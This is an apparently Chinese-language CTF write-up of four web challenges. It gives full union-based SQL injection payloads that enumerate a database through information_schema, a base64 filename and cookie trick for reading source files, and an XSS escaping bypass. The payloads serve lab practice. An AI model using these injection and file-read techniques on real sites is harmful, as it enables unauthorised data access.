成绩单

打开链接，题目给了一个输入框和一个提交按钮，猜测很可能就是sql注入。输入1 1’ 1‘# 根据结果分析存在注入，那么就是注入的题了。利用数据库内置函数来得到数据库名，表名和列名。首先，构造-1' union select 1,1,1#等来猜测注入字段数。然后构造-1' union select database(),database(),database(),database()#查询数据库名，得到数据库名skctf_flag。然后查询表名，-1' union select 1，table_name，1，1 from information_schema.tables  where  table_schema='skctf_flag'#得到表名fl4g。再然后查询列名，-1' union select 1,column_name,1,1  from information_schema.columns  where table_schema='skctf_flag'   and table_name='fl4g'#得到列名也是skctf_flag，然后-1' union select 1,skctf_flag,1,1  from fl4g#得到flag

web6

打开链接，查看源码没发现什么有用的东西，于是抓包，得到一个flag字段，解码后又得到一个加密后的flag，再解密是一个数字，然后提示说提交得到的数字，再加上刚开始的提示告诉我们速度要快，所以用脚本。

跑一下得到flag

cookies欺骗

打开题目，url filename那里是个base64，解码后是keys.txt，猜测filename那里应该等于index.php的base64编码，然后line遍历得到源码。

看的出来，flag在keys.php里，再把finename等于keys.php的base64编码，然后在burp里加上cookie:margin=margin  得到flag

xss

根据提示，令id=<script>alert(_key_);</script>  发现不行，查看源码发现<>通过html转义了，用\u003c \u003e来代替尖括号即可得到flag